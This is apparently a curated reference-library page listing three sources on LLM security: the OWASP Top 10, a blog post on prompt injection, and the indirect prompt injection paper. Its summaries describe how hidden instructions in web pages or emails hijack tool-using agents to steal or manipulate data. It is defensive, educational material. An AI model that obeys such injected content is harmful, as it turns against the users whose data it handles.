News & Library

Reference library

The best external writing on AI testing, limitations and quality — curated, summarized, and rated. We link out to the source; the value-add is our summary and the findings each piece connects to.

3 references

White paperHigh credibilityOWASP
OWASP Top 10 for Large Language Model Applications
A community-built catalog of the most critical security risks for LLM applications — prompt injection, insecure output handling, training-data poisoning, and more — with mitigations for each.
🐛 1 linked findingPrompt injectionSafety
BlogHigh credibilitySimon Willison’s Weblog
Prompt injection: what’s the worst that can happen?
An accessible explanation of why prompt injection is hard to fix: once an LLM agent processes untrusted content, that content can hijack its instructions. Walks through concrete exfiltration and abuse scenarios for tool-using assistants.
🐛 2 linked findingsPrompt injectionSafetyAgents
PaperHigh credibilityarXiv
Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection
Demonstrates indirect prompt injection against real LLM-integrated applications: adversarial instructions hidden in web pages, emails, or other retrieved content hijack the model when it later processes them — no access to the prompt required. Catalogs concrete attacks (data theft, manipulation) on tool- and retrieval-connected systems.
🐛 2 linked findingsPrompt injectionSafetyAgents

OWASP Top 10 for Large Language Model Applications

Prompt injection: what’s the worst that can happen?

Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection